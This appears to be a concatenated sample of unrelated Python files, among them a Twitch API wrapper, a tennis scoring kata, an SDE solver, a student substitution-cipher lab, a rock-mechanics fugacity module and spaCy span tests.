                raise Exceptions.ChannelNotFound
            except Exception:
                raise Exceptions.NetworkError
        elif mode.isVideo():
            try:
                return cls.API.getVideo(query)
            except TwitchGqlAPI.Exceptions.DataNotFound:
                raise Exceptions.VideoNotFound
            except Exception:
                raise Exceptions.NetworkError
        else:
            try:
                return cls.API.getClip(query)
            except TwitchGqlAPI.Exceptions.DataNotFound:
                raise Exceptions.ClipNotFound
            except Exception:
                raise Exceptions.NetworkError

    @classmethod
    def Channel(cls, username):
        """Look up a channel by login name."""
        try:
            return cls.API.getChannel(login=username)
        except TwitchGqlAPI.Exceptions.DataNotFound:
            raise Exceptions.ChannelNotFound
        except Exception:
            # Robustness fix: was a bare 'except:', which also swallowed
            # KeyboardInterrupt/SystemExit.
            raise Exceptions.NetworkError

    @classmethod
    def ChannelVideos(cls, channel, videoType, sort, cursor):
        """Fetch one page of a channel's videos."""
        try:
            return cls.API.getChannelVideos(channel, videoType, sort, cursor=cursor)
        except TwitchGqlAPI.Exceptions.DataNotFound:
            raise Exceptions.ChannelNotFound
        except Exception:
            raise Exceptions.NetworkError

    @classmethod
    def ChannelClips(cls, channel, filter, cursor):
        """Fetch one page of a channel's clips."""
        try:
            return cls.API.getChannelClips(channel, filter, cursor=cursor)
        except TwitchGqlAPI.Exceptions.DataNotFound:
            raise Exceptions.ChannelNotFound
        except Exception:
            raise Exceptions.NetworkError

    @classmethod
    def StreamAccessToken(cls, login, oAuthToken):
        """Request a live-stream playback token for *login*."""
        try:
            return TwitchPlaybackAccessTokens.TwitchStream(login, oAuthToken)
        except TwitchPlaybackAccessTokens.Exceptions.TokenError:
            # Bug fix: the original re-raised the bare exception class,
            # discarding the message/args; re-raise the caught instance.
            raise
        except Exception:
            raise Exceptions.NetworkError

    @classmethod
    def VideoAccessToken(cls, videoId, oAuthToken):
        """Request a VOD playback token for *videoId*."""
        try:
            return TwitchPlaybackAccessTokens.TwitchVideo(videoId, oAuthToken)
        except TwitchPlaybackAccessTokens.Exceptions.TokenError:
            raise
        except Exception:
            raise Exceptions.NetworkError

    @classmethod
    def ClipAccessToken(cls, slug, oAuthToken):
        """Request a clip playback token for *slug*."""
        try:
            return TwitchPlaybackAccessTokens.TwitchClip(slug, oAuthToken)
        except TwitchPlaybackAccessTokens.Exceptions.TokenError:
            raise
        except Exception:
            raise Exceptions.NetworkError
class SearchThread(WorkerThread):
    """Runs a Search.* call off the UI thread, reporting back via *callback*.

    The thread starts itself immediately on construction.
    """
    def __init__(self, target, callback, args=None, kwargs=None):
        super().__init__(target, args, kwargs)
        # resultSignal delivers the target's result (or failure) to callback.
        self.resultSignal.connect(callback)
        self.start()
import sys
# Python 2 stream filter: '#' comment lines pass through trimmed; data lines
# emit three whitespace-trimmed fixed-width columns taken from character
# offsets 31-38, 38-46 and 46-54 of each input line.
for line in sys.stdin:
    if line.startswith('#'):
        print line.strip()
    else:
        print line[31:38].strip(), line[38:46].strip(), line[46:54].strip()
|
# -*- coding: utf-8 -*-
class Player:
    """A tennis player tracking the raw points scored in the current game."""

    def __init__(self, name):
        self.name = name
        self.points = 0

    def win_point(self):
        """Award one point to this player."""
        self.points += 1

    def won_with(self, other_player):
        """True when this player has won the game against *other_player*:
        at least four points and a lead of two or more."""
        return (self.points >= 4
                and other_player.points >= 0
                and self.points - other_player.points >= 2)

    def advantage_over(self, other_player):
        """True when this player holds advantage (both in deuce territory)."""
        return other_player.points >= 3 and self.points > other_player.points
class Translator:
    """Turns raw point counts into the traditional tennis score call."""

    def __init__(self):
        pass

    def translate(self, score_1, score_2):
        """Render a non-terminal score (no win / no advantage) as text."""
        if score_1 == score_2:
            # Tied scores read "<call>-All" until deuce territory (3+ each).
            return self.score_to_word(score_1) + "-All" if score_1 < 3 else "Deuce"
        return "{}-{}".format(self.score_to_word(score_1),
                              self.score_to_word(score_2))

    def score_to_word(self, score):
        """Map 0-3 points to the conventional call-out."""
        calls = {
            0: "Love",
            1: "Fifteen",
            2: "Thirty",
            3: "Forty"
        }
        return calls[score]
class TennisGame:
    """Scores a single tennis game between two named players."""

    def __init__(self, player_1_name, player_2_name):
        self.player_1 = Player(player_1_name)
        self.player_2 = Player(player_2_name)
        self.translator = Translator()

    def won_point(self, player_name):
        """Record a point for the named player (anyone else scores for player 2)."""
        scorer = self.player_1 if player_name == self.player_1.name else self.player_2
        scorer.win_point()

    def score(self):
        """Return the current call: win, advantage, or a translated score."""
        pairings = ((self.player_1, self.player_2),
                    (self.player_2, self.player_1))
        for contender, rival in pairings:
            if contender.won_with(rival):
                return "Win for " + contender.name
        for contender, rival in pairings:
            if contender.advantage_over(rival):
                return "Advantage " + contender.name
        return self.translator.translate(
            self.player_1.points,
            self.player_2.points)
|
import numpy as np
from ..local_interpolation import ThirdOrderHermitePolynomialInterpolation
from .base import AbstractAdaptiveSDESolver, AbstractStratonovichSolver
from .runge_kutta import AbstractERK, ButcherTableau
# Butcher tableau for the explicit midpoint rule: one half-step stage and a
# full-weight second stage; b_error encodes the embedded Euler difference.
_midpoint_tableau = ButcherTableau(
    a_lower=(np.array([0.5]),),
    b_sol=np.array([0.0, 1.0]),
    b_error=np.array([1.0, -1.0]),
    c=np.array([0.5]),
)


class Midpoint(AbstractERK, AbstractStratonovichSolver, AbstractAdaptiveSDESolver):
    """Midpoint method.

    2nd order explicit Runge--Kutta method. Has an embedded Euler method for adaptive
    step sizing.

    Also sometimes known as the "modified Euler method".

    When used to solve SDEs, converges to the Stratonovich solution.
    """

    tableau = _midpoint_tableau
    interpolation_cls = ThirdOrderHermitePolynomialInterpolation.from_k

    def order(self, terms):
        # Deterministic (ODE) convergence order.
        return 2

    def strong_order(self, terms):
        # Strong convergence order when solving SDEs.
        return 0.5
|
from django.conf.urls import url
from . import views
urlpatterns = [
    # Landing page: display the form.
    url(r'^$', views.view_form, name='view_form'),
    # Form creation page and its post-creation confirmation view.
    url(r'^create_form$', views.create_form, name='create_form'),
    url(r'^created_form$', views.created_form, name='created_form'),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
#
#
################################################################################
# =============================================================================
# Param Exact Class
# =============================================================================
from federatedml.util import consts
import json
import inspect
class ParamExtract(object):
    """Initializes federatedml param objects from a user-supplied JSON config."""
    def __init__(self):
        pass

    @staticmethod
    def parse_param_from_config(param_var, config_file):
        """
        load json in config_file and initialize all variables define in param_var by json config

        Parameters
        ----------
        param_var : object, define in federatedml.param.param,
            the parameter object need to be initialized.

        config_file : str, the path of json config path,
            define by users, the variables in param object the user want to initialize.

        Returns
        -------
        param_var : object, define in federatedml.param.param,
            the initialized result
        """
        config_json = None
        with open(config_file, "r") as fin:
            config_json = json.loads(fin.read())
        # print('In param extract, config_json is :{}'.format(config_json))
        # NOTE(review): json.loads raises on malformed input, so config_json
        # can only be None here when the file literally contains "null".
        if config_json is None:
            raise Exception("config file is not valid, please have a check!")
        # Every class declared in the param module marks an attribute type
        # that must be recursed into rather than assigned directly.
        from federatedml.param import param
        valid_classes = [class_info[0] for class_info in inspect.getmembers(param, inspect.isclass)]
        param_var = ParamExtract.recursive_parse_param_from_config(param_var, config_json, valid_classes,
                                                                   param_parse_depth=0)
        return param_var

    @staticmethod
    def recursive_parse_param_from_config(param, config_json, valid_classes, param_parse_depth):
        """
        Initialize all variables by config.
        If variable is define in federatedml.param.param, then recursively initialize it,
        otherwise, just assignment the value define in config.

        Parameters
        ----------
        param : object, define in federatedml.param.param,
            the parameter object need to be initialized.

        config_json : dict, a dict load by the config file,
            the variables config.

        valid_classes : list, all objects define in federatedml.param.param,
            use to judge if the type of a variable is self-define param object or not

        param_parse_depth : int, max recursive depth.

        Returns
        -------
        param : object, define in federatedml.param.param,
            the initialized result
        """
        if param_parse_depth > consts.PARAM_MAXDEPTH:
            raise ValueError("Param define nesting too deep!!!, can not parse it")
        # Config sections are keyed by the param class name.
        default_section = type(param).__name__
        inst_variables = param.__dict__
        for variable in inst_variables:
            attr = getattr(param, variable)
            if type(attr).__name__ in valid_classes:
                # Nested param object: recurse with an incremented depth.
                sub_params = ParamExtract.recursive_parse_param_from_config(attr, config_json, valid_classes,
                                                                            param_parse_depth + 1)
                setattr(param, variable, sub_params)
            else:
                # Plain value: override only when the config provides it.
                if default_section in config_json and variable in config_json[default_section]:
                    option = config_json[default_section][variable]
                    setattr(param, variable, option)
        return param

    @staticmethod
    def is_class(var):
        # NOTE(review): every Python object has __class__, so this always
        # returns True — looks vestigial; confirm before relying on it.
        return hasattr(var, "__class__")
|
#!/usr/bin/python
'''_____________________________________________________________________________
'
' Created By: Kevin M. Albright
' Creation Date: 04.13.2014
'
' Modified By: Kevin M. Albright
' Last Modified: 04.14.2014
'
' Assignment: Lab8
' File Name: albright_lab8.py
' Purpose: This program will
' (1) Open and read in the contents of provided file name.
' (2) Using a dictionary write out to another file the
' values matching keys in the dictionary character by
' character.
' The program will check that the provided file name is a
' valid file, if invalid will print a message and exit.
' If no arguments are provided, will print out instructions on
' how to use program.
' The user can provide the flag "-d" to have the program
' decrypt the provided file.
' Encrypted files are named "encrypted_" + filename
' Decrypted files are named "decrypted_" + filename
' Decrypting will remove "encrypted_" from filename when
' making decrypted filename.
' Files writen are located in programs directory.
' Dictionary keys and values are stored as the ASCII code
' values.
_____________________________________________________________________________'''
#from random import sample ## Prevusly used to create the First iteration of
## random values. Tweaked this to get final
## values used.
from sys import argv
from os.path import isfile ## for File checks.
from os.path import basename ## for file name from path.
from string import lower
from string import replace
#|||| Check input arguments.
if len(argv) == 1: ## No arguments: print usage instructions.
    print '\n____ To use this script:'
    print ' ./albright_lab8.py filename [-d]'
    print ' Encrypt: ./albright_lab8.py text.txt'
    print ' Decrypt: ./albright_lab8.py encrypted_text.txt -d'
    print ' Flag: -d for decryption'
    print ' No flag for encryption.\n'
    exit()
elif len(argv) > 1: ## If arguments given.
    if not isfile(argv[1]): ## Check for valid file.
        print '\n>>>>>>> Invalid file. Please enter a valid file name.\n'
        exit()
    elif len(argv) == 3: ## If flag given, it must be -d (case-insensitive).
        if lower(argv[2]) != '-d':
            print '\n>>>>>>> Invalid flag. Please enter -d for decript.'
            print ' And no flag for encrypt.\n'
            exit()
    elif len(argv) > 3: ## If too many arguments.
        print '\n>>>>>>> Invalid. To many input arguments.\n'
        exit()
#|||| Open files, Name Encrypt file or Decrypt file.
fin = open(argv[1]) ## Open input file.
if len(argv) == 3 and argv[2].lower() == '-d': ## Create decrypt file.
    ## Decrypting strips the leading "encrypted_" from the source name.
    fout = open('decrypted_' + replace(basename(argv[1]),'encrypted_','',1),"w")
else: ## Create encrypt file.
    fout = open('encrypted_' + basename(argv[1]),"w")
keys = [9,10] + range(32,127) ## Character keys as ordinals: tab, LF, printable ASCII.
#sample(keys,len(keys)) ## Old random values maker.
## Values for the keys: a fixed permutation of the same ordinals, so the
## cipher is a simple substitution over the printable-ASCII alphabet.
values = [80,90,86,48,102,46,40,62,71,83,115,43,44,69,101,39,59,99,54,67,100,118,105,33,42,119,88,91,114,109,96,37,79,97,116,55,65,56,125,75,52,111,112,77,103,123,87,10,94,81,76,49,104,68,9,64,57,93,73,60,120,38,70,85,82,89,63,34,110,36,84,113,66,78,108,47,41,61,117,45,58,126,53,92,72,50,124,51,98,122,32,106,74,95,35,107,121]
if len(argv) == 3 and argv[2].lower() == '-d': ## Decrypt dictionary (inverse mapping).
    code = dict(zip(values,keys))
else: ## Encrypt dictionary.
    code = dict(zip(keys,values))
input = fin.read() ## Read file.
for char in input:
    if code.has_key(ord(char)): ## If code has key print value as char.
        fout.write(chr(code[ord(char)]))
    else: ## Else just reprint char from file.
        fout.write(char)
fout.close()
fin.close()
|
import os
# Driver half: runs only on the launcher host (RUN_ON_DORA set by the CLI).
if os.environ.get('RUN_ON_DORA'):
    import dorasl as DoraServerless
    dora = DoraServerless.Dora()
    number_of_replicas = 3
    number_of_gpu = 1
    number_of_cpu = '200m'  # kubernetes-style millicpu string (currently unused)
    # Push the working directory to the 'home' volume and keep it synced.
    dora.upload('./', 'home', 'pytest45')
    dora.sync('./', 'home', 'pytest45', True)
    # Setup the workload
    wk = DoraServerless.Workload('my.py')
    wk.set_replica(number_of_replicas)
    wk.set_image('tensorflow/tensorflow')
    wk.set_gpu('', number_of_gpu)
    #wk.set_cpu('All', number_of_cpu)
    wk.add_volume({'name': 'home', 'target': '/home'})
    wk.drain_on_exit()
    wk.apply()
    # Block until every replica reports ready (replica ids are 1-based).
    for x in range(number_of_replicas):
        wk.wait_readiness(str(x + 1))
    #for x in range(number_of_replicas):
    #    wk.exec(str(x + 1), ['python3', '/home/pytest1/test.py'], False)
    wk.exec('1', '/bin/bash')
    dora.close()
# This is what will be executed inside Dora
# (worker half: a trivial 50-second counter as the remote payload).
import time
for x in range(50):
    print(x)
    time.sleep(1)
|
def f(n, left):
    """Count stair-step 'methods' for *n* steps with *left* steps remaining.

    Base cases: 1 or 2 steps have one method, 3 steps have two. For n > 3
    the count recurses on (n, left); when left < 3 and n > 3 no branch
    matches and None is returned, exactly as in the original.
    """
    if n in (1, 2):
        return 1
    if n == 3:
        return 2
    if n > 3:
        if left == 3:
            return f(3, 0) * f(n - 3, 0)
        if left > 3:
            return (f(3, left - 2) * f(n - 2, left - 2)
                    + f(1, 0) * f(n - 1, left - 1))
    # n > 3 with left < 3: intentionally unhandled (yields None).
    return None
if __name__=='__main__':
    # Python 2 entry point: tabulate f(step, step) for steps 1..10.
    for step in range(1,11):
        print '%3d step has %10d method' % (step,f(step,step))
|
import numpy as np
from scipy import optimize as opt
import math
# Create coefficient tables to solve for equations of state.
# PS_COEFF[i][j] holds the coefficient of T^p (p = -4, -2, -1, 0, 1, 2 for
# j = 0..5) used to build c_i(T) — presumably Table 1 of Pitzer & Sterner
# (1994); confirm against the paper. Unset entries stay 0.
PS_COEFF = np.zeros([10, 10])
PS_COEFF[0][2] = 0.24657688*math.pow(10, 6)
PS_COEFF[0][3] = 0.51359951*math.pow(10, 2)
PS_COEFF[1][2] = 0.58638965*math.pow(10, 0)
PS_COEFF[1][3] = -0.28646939*math.pow(10, -2)
PS_COEFF[1][4] = 0.31375577*math.pow(10, -4)
PS_COEFF[2][2] = -0.62783840*math.pow(10, 1)
PS_COEFF[2][3] = 0.14791599*math.pow(10, -1)
PS_COEFF[2][4] = 0.35779579*math.pow(10, -3)
PS_COEFF[2][5] = 0.15432925*math.pow(10, -7)
PS_COEFF[3][3] = -0.42719875*math.pow(10, 0)
PS_COEFF[3][4] = -0.16325155*math.pow(10, -4)
PS_COEFF[4][2] = 0.56654978*math.pow(10, 4)
PS_COEFF[4][3] = -0.16580167*math.pow(10, 2)
PS_COEFF[4][4] = 0.76560762*math.pow(10, -1)
PS_COEFF[5][3] = 0.10917883*math.pow(10, 0)
PS_COEFF[6][0] = 0.38878656*math.pow(10, 13)
PS_COEFF[6][1] = -0.13494878*math.pow(10, 9)
PS_COEFF[6][2] = 0.30916564*math.pow(10, 6)
PS_COEFF[6][3] = 0.75591105*math.pow(10, 1)
PS_COEFF[7][2] = -0.65537898*math.pow(10, 5)
PS_COEFF[7][3] = 0.18810675*math.pow(10, 3)
PS_COEFF[8][0] = -0.14182435*math.pow(10, 14)
PS_COEFF[8][1] = 0.18165390*math.pow(10, 9)
PS_COEFF[8][2] = -0.19769068*math.pow(10, 6)
PS_COEFF[8][3] = -0.23530318*math.pow(10, 2)
PS_COEFF[9][2] = 0.92093375*math.pow(10, 5)
PS_COEFF[9][3] = 0.12246777*math.pow(10, 3)

# Temperature-dependent coefficients c_i(T); filled in place by
# calculate_coefficient_table() and read by eos() / PSfug().
CS = np.zeros([10])

# Constants
# CONSTANT_B = 2451 #(Holyoke and Kronenberg, 2010) #3631 (Stipp and Tullis, 2003)
#EXPONENT = -1.26
# 1.45E4 -1.47 Twiss 1977 #Get more from literature
# 339 -0.58 Koch 1983 # from Gleason and Tullis, 1993 (GRL)

# Grain-size piezometer calibrations: stress = Constant_B * d^Exponent.
PIEZOMETERS = {
    'ST03': {'Constant_B': 3631, 'Exponent': -1.26, "Name": "Stipp and Tullis (2003)"},
    'HK10': {'Constant_B': 2451, 'Exponent': -1.26, "Name": "Holyoke and Kronenberg (2010)"},
    'K83': {'Constant_B': 339, 'Exponent': -0.58, "Name": "Koch (1983)"},
    'T77': {'Constant_B': 1.45E4, 'Exponent': -1.47, "Name": "Twiss (1977)"}
}

# Quartz dislocation-creep flow-law parameters (A: pre-exponential, n: stress
# exponent, Q: activation energy).
FLOW_LAWS = {
    "KT84": {"A": 2.2E-6, "n": 2.7, "Q": 1.2E5, "Name": "Kronenberg and Tullis (1984)"},
    'GT95wm': {"A": 1.8E-8, "n": 4, "Q": 1.37E5, "Name": "Gleason and Tullis (1995) with melt"},
    'J84': {"A": 2.88E-3, "n": 1.8, "Q": 1.51E5, "Name": "Jaoul et al. (1984)"},
    'K89': {"A": 1.16E-7, "n": 2.72, "Q": 1.34E5, "Name": "Koch et al. (1989)"},
    'HC82': {"A": 1.99E-2, "n": 1.8, "Q": 1.67E5, "Name": "Hansen and Carter (1982)"},
    'LP92g': {"A": 6.6E-8, "n": 3.1, "Q": 1.35E5, "Name": "Luan and Paterson (1992) with gel"},
    'LP92a': {"A": 3.98E-10, "n": 4, "Q": 1.35E5, "Name": "Luan and Paterson (1992) with acid"},
    "H01": {"A": 6.3E-12, "n": 4, "Q": 1.35E5, "Name": "Hirth et al. (2001)"},
    "RB04": {"A": 1.2E-5, "n": 2.97, "Q": 2.42E5, "Name": "Rutter and Brodie (2004)"}
}
def calculate_coefficient_table(temperature):
    """Fill the module-level CS array with temperature-dependent coefficients.

    Each row i of PS_COEFF holds the multipliers of T^-4, T^-2, T^-1, T^0,
    T^1 and T^2 for coefficient c_i(T); the result is stored in CS[i]
    (mutates the module-level array in place, same as before).
    """
    for idx, row in enumerate(PS_COEFF):
        CS[idx] = (row[0] * math.pow(temperature, -4)
                   + row[1] * math.pow(temperature, -2)
                   + row[2] * math.pow(temperature, -1)
                   + row[3]
                   + row[4] * temperature
                   + row[5] * math.pow(temperature, 2))
# CALCULATE EQUATIONS OF STATE AND FUGACITY
# Solve Equation of state, Eq 2 of Pitzer and Sterner (1994)
# Returns pressure in Pa
def eos(T, V):
    """Pitzer & Sterner (1994) equation of state, their Eq. 2.

    T: temperature; V: molar volume. Reads the module-level CS coefficients
    (populate via calculate_coefficient_table first). Returns pressure in Pa.
    """
    rho = 1 / V  # density as inverse molar volume
    R = 8314472  # gas constant in the units used by this formulation
    numerator = (CS[2] + 2 * CS[3] * rho + 3 * CS[4] * math.pow(rho, 2)
                 + 4 * CS[5] * math.pow(rho, 3))
    denominator = math.pow((CS[1] + CS[2] * rho + CS[3] * math.pow(rho, 2)
                            + CS[4] * math.pow(rho, 3) + CS[5] * math.pow(rho, 4)), 2)
    p = rho + CS[0] * math.pow(rho, 2) - math.pow(rho, 2) * (numerator / denominator)
    p = p + (CS[6] * math.pow(rho, 2) * math.exp(-CS[7] * rho)
             + CS[8] * math.pow(rho, 2) * math.exp(-CS[9] * rho))
    return p * (R * T)  # pressure in Pa
# Solve for fugacity, Eq 1 of Pitzer and Sterner (1994)
# Returns fugacity in MPa
def PSfug(P, T, V):
    """Fugacity from Eq. 1 of Pitzer and Sterner (1994).

    P: pressure (Pa); T: temperature; V: molar volume. Reads the module-level
    CS coefficients. Returns fugacity in MPa.
    """
    rho = 1 / V
    R = 8314472
    poly = (CS[1] + CS[2] * rho + CS[3] * math.pow(rho, 2)
            + CS[4] * math.pow(rho, 3) + CS[5] * math.pow(rho, 4))
    quotient = CS[0] * rho + (1 / poly - 1 / CS[1])
    quotient -= CS[6] / CS[7] * (math.exp(-CS[7] * rho) - 1)
    quotient -= CS[8] / CS[9] * (math.exp(-CS[9] * rho) - 1)
    lnf = (math.log(rho) + quotient + P / (rho * R * T)) + math.log(R * T) - 1
    return math.exp(lnf) / 1e6  # fugacity in MPa
# Optimizing equation to solve for volume
def fugacity_optimizer(temperature, pressure):
    """Solve the EOS for molar volume at (temperature, pressure), then
    return the corresponding fugacity (MPa).

    Brent's method brackets the volume root in [5, 30] cc/mol.
    """
    def pressure_residual(v):
        return eos(temperature, v) - pressure

    volume = opt.brentq(pressure_residual, 5, 30)  # Volume in cc/mol
    return PSfug(pressure, temperature, volume)
|
import pytest
from spacy.attrs import ORTH, LENGTH
from spacy.tokens import Doc, Span, Token
from spacy.vocab import Vocab
from spacy.util import filter_spans
from .test_underscore import clean_underscore # noqa: F401
@pytest.fixture
def doc(en_tokenizer):
    """Three-sentence doc (14 tokens) with a full dependency parse."""
    # fmt: off
    text = "This is a sentence. This is another sentence. And a third."
    heads = [1, 1, 3, 1, 1, 6, 6, 8, 6, 6, 12, 12, 12, 12]
    deps = ["nsubj", "ROOT", "det", "attr", "punct", "nsubj", "ROOT", "det",
            "attr", "punct", "ROOT", "det", "npadvmod", "punct"]
    # fmt: on
    tokens = en_tokenizer(text)
    return Doc(tokens.vocab, words=[t.text for t in tokens], heads=heads, deps=deps)

@pytest.fixture
def doc_not_parsed(en_tokenizer):
    """Same text, but without any parse / sentence-boundary annotation."""
    text = "This is a sentence. This is another sentence. And a third."
    tokens = en_tokenizer(text)
    doc = Doc(tokens.vocab, words=[t.text for t in tokens])
    return doc
@pytest.mark.parametrize(
    "i_sent,i,j,text",
    [
        (0, 0, len("This is a"), "This is a"),
        (1, 0, len("This is another"), "This is another"),
        (2, len("And "), len("And ") + len("a third"), "a third"),
        (0, 1, 2, None),  # offsets that don't align to token boundaries -> None
    ],
)
def test_char_span(doc, i_sent, i, j, text):
    """Sentence-relative char offsets resolve to the expected span (or None)."""
    sents = list(doc.sents)
    span = sents[i_sent].char_span(i, j)
    if not text:
        assert not span
    else:
        assert span.text == text

def test_spans_sent_spans(doc):
    # Sentence spans should tile the doc exactly.
    sents = list(doc.sents)
    assert sents[0].start == 0
    assert sents[0].end == 5
    assert len(sents) == 3
    assert sum(len(sent) for sent in sents) == len(doc)

def test_spans_root(doc):
    # Span root is the token whose head lies outside the span.
    span = doc[2:4]
    assert len(span) == 2
    assert span.text == "a sentence"
    assert span.root.text == "sentence"
    assert span.root.head.text == "is"

def test_spans_string_fn(doc):
    span = doc[0:4]
    assert len(span) == 4
    assert span.text == "This is a sentence"
def test_spans_root2(en_tokenizer):
    """Root of a trailing span in a coordinated phrase."""
    text = "through North and South Carolina"
    heads = [0, 4, 1, 1, 0]
    deps = ["dep"] * len(heads)
    tokens = en_tokenizer(text)
    doc = Doc(tokens.vocab, words=[t.text for t in tokens], heads=heads, deps=deps)
    assert doc[-2:].root.text == "Carolina"

def test_spans_span_sent(doc, doc_not_parsed):
    """Test span.sent property"""
    assert len(list(doc.sents))
    assert doc[:2].sent.root.text == "is"
    assert doc[:2].sent.text == "This is a sentence ."
    assert doc[6:7].sent.root.left_edge.text == "This"
    # test on manual sbd (sentence boundaries set directly on tokens)
    doc_not_parsed[0].is_sent_start = True
    doc_not_parsed[5].is_sent_start = True
    assert doc_not_parsed[1:3].sent == doc_not_parsed[0:5]
    assert doc_not_parsed[10:14].sent == doc_not_parsed[5:]

def test_spans_lca_matrix(en_tokenizer):
    """Test span's lca matrix generation"""
    tokens = en_tokenizer("the lazy dog slept")
    doc = Doc(
        tokens.vocab,
        words=[t.text for t in tokens],
        heads=[2, 2, 3, 3],
        deps=["dep"] * 4,
    )
    # Indices in the matrix are span-relative; -1 means the LCA is outside the span.
    lca = doc[:2].get_lca_matrix()
    assert lca.shape == (2, 2)
    assert lca[0, 0] == 0  # the & the -> the
    assert lca[0, 1] == -1  # the & lazy -> dog (out of span)
    assert lca[1, 0] == -1  # lazy & the -> dog (out of span)
    assert lca[1, 1] == 1  # lazy & lazy -> lazy
    lca = doc[1:].get_lca_matrix()
    assert lca.shape == (3, 3)
    assert lca[0, 0] == 0  # lazy & lazy -> lazy
    assert lca[0, 1] == 1  # lazy & dog -> dog
    assert lca[0, 2] == 2  # lazy & slept -> slept
    lca = doc[2:].get_lca_matrix()
    assert lca.shape == (2, 2)
    assert lca[0, 0] == 0  # dog & dog -> dog
    assert lca[0, 1] == 1  # dog & slept -> slept
    assert lca[1, 0] == 1  # slept & dog -> slept
    assert lca[1, 1] == 1  # slept & slept -> slept
def test_span_similarity_match():
    """Similarity between spans with identical words, without vectors (warns)."""
    doc = Doc(Vocab(), words=["a", "b", "a", "b"])
    span1 = doc[:2]
    span2 = doc[2:]
    with pytest.warns(UserWarning):
        assert span1.similarity(span2) == 1.0
        assert span1.similarity(doc) == 0.0
        assert span1[:1].similarity(doc.vocab["a"]) == 1.0

def test_spans_default_sentiment(en_tokenizer):
    """Test span.sentiment property's default averaging behaviour"""
    text = "good stuff bad stuff"
    tokens = en_tokenizer(text)
    tokens.vocab[tokens[0].text].sentiment = 3.0
    tokens.vocab[tokens[2].text].sentiment = -2.0
    doc = Doc(tokens.vocab, words=[t.text for t in tokens])
    # Span sentiment is the mean over the span's tokens.
    assert doc[:2].sentiment == 3.0 / 2
    assert doc[-2:].sentiment == -2.0 / 2
    assert doc[:-1].sentiment == (3.0 + -2) / 3.0

def test_spans_override_sentiment(en_tokenizer):
    """Test that a user_span_hooks['sentiment'] hook overrides the default averaging."""
    text = "good stuff bad stuff"
    tokens = en_tokenizer(text)
    tokens.vocab[tokens[0].text].sentiment = 3.0
    tokens.vocab[tokens[2].text].sentiment = -2.0
    doc = Doc(tokens.vocab, words=[t.text for t in tokens])
    doc.user_span_hooks["sentiment"] = lambda span: 10.0
    assert doc[:2].sentiment == 10.0
    assert doc[-2:].sentiment == 10.0
    assert doc[:-1].sentiment == 10.0

def test_spans_are_hashable(en_tokenizer):
    """Test spans can be hashed."""
    text = "good stuff bad stuff"
    tokens = en_tokenizer(text)
    span1 = tokens[:2]
    span2 = tokens[2:4]
    assert hash(span1) != hash(span2)
    # Spans over the same doc slice hash equal.
    span3 = tokens[0:2]
    assert hash(span3) == hash(span1)
def test_spans_by_character(doc):
    """doc.char_span alignment modes: strict (default), contract, expand."""
    span1 = doc[1:-2]
    # default and specified alignment mode "strict"
    span2 = doc.char_span(span1.start_char, span1.end_char, label="GPE")
    assert span1.start_char == span2.start_char
    assert span1.end_char == span2.end_char
    assert span2.label_ == "GPE"
    span2 = doc.char_span(
        span1.start_char, span1.end_char, label="GPE", alignment_mode="strict"
    )
    assert span1.start_char == span2.start_char
    assert span1.end_char == span2.end_char
    assert span2.label_ == "GPE"
    # alignment mode "contract": shrink misaligned offsets to token boundaries
    span2 = doc.char_span(
        span1.start_char - 3, span1.end_char, label="GPE", alignment_mode="contract"
    )
    assert span1.start_char == span2.start_char
    assert span1.end_char == span2.end_char
    assert span2.label_ == "GPE"
    # alignment mode "expand": grow misaligned offsets to token boundaries
    span2 = doc.char_span(
        span1.start_char + 1, span1.end_char, label="GPE", alignment_mode="expand"
    )
    assert span1.start_char == span2.start_char
    assert span1.end_char == span2.end_char
    assert span2.label_ == "GPE"
    # unsupported alignment mode
    with pytest.raises(ValueError):
        span2 = doc.char_span(
            span1.start_char + 1, span1.end_char, label="GPE", alignment_mode="unk"
        )

def test_span_to_array(doc):
    span = doc[1:-2]
    arr = span.to_array([ORTH, LENGTH])
    assert arr.shape == (len(span), 2)
    assert arr[0, 0] == span[0].orth
    assert arr[0, 1] == len(span[0])

def test_span_as_doc(doc):
    span = doc[4:10]
    span_doc = span.as_doc()
    assert span.text == span_doc.text.strip()
    assert isinstance(span_doc, doc.__class__)
    assert span_doc is not doc
    # The copied doc is re-offset to start at character 0.
    assert span_doc[0].idx == 0
@pytest.mark.usefixtures("clean_underscore")
def test_span_as_doc_user_data(doc):
    """Test that the user_data can be preserved (but not by default). """
    my_key = "my_info"
    my_value = 342
    doc.user_data[my_key] = my_value
    Token.set_extension("is_x", default=False)
    doc[7]._.is_x = True
    span = doc[4:10]
    span_doc_with = span.as_doc(copy_user_data=True)
    span_doc_without = span.as_doc()
    assert doc.user_data.get(my_key, None) is my_value
    assert span_doc_with.user_data.get(my_key, None) is my_value
    assert span_doc_without.user_data.get(my_key, None) is None
    # Doc token 7 becomes span-copy token 3 (span starts at 4).
    for i in range(len(span_doc_with)):
        if i != 3:
            assert span_doc_with[i]._.is_x is False
        else:
            assert span_doc_with[i]._.is_x is True
    assert not any([t._.is_x for t in span_doc_without])

def test_span_string_label_kb_id(doc):
    # String label/kb_id are interned in the vocab's string store.
    span = Span(doc, 0, 1, label="hello", kb_id="Q342")
    assert span.label_ == "hello"
    assert span.label == doc.vocab.strings["hello"]
    assert span.kb_id_ == "Q342"
    assert span.kb_id == doc.vocab.strings["Q342"]

def test_span_label_readonly(doc):
    # label_ cannot be assigned after construction.
    span = Span(doc, 0, 1)
    with pytest.raises(NotImplementedError):
        span.label_ = "hello"

def test_span_kb_id_readonly(doc):
    # kb_id_ cannot be assigned after construction.
    span = Span(doc, 0, 1)
    with pytest.raises(NotImplementedError):
        span.kb_id_ = "Q342"
def test_span_ents_property(doc):
    """Test span.ents for entities at the start, middle and end of sentences."""
    doc.ents = [
        (doc.vocab.strings["PRODUCT"], 0, 1),
        (doc.vocab.strings["PRODUCT"], 7, 8),
        (doc.vocab.strings["PRODUCT"], 11, 14),
    ]
    assert len(list(doc.ents)) == 3
    sentences = list(doc.sents)
    assert len(sentences) == 3
    assert len(sentences[0].ents) == 1
    # First sentence, also tests start of sentence
